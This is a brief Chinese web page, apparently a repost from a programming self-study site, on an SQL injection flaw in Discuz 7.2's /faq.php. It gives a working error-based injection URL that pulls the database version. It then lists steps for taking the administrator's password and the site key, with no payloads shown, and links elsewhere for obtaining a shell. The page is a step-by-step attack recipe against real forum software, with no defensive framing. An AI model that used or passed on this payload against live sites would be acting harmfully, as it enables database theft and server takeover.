1.获取 数据库 版本信息
http://www.xxoo.com/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema .tables group by x)a)%23
2.获取管理员账户密码
3.获取key
getshell参见 http://www.2cto.com/Article/201401/272274. html
查看更多关于Discuz 7.2 /faq.php SQL注入漏洞 - 网站安全 - 自学ph的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did15440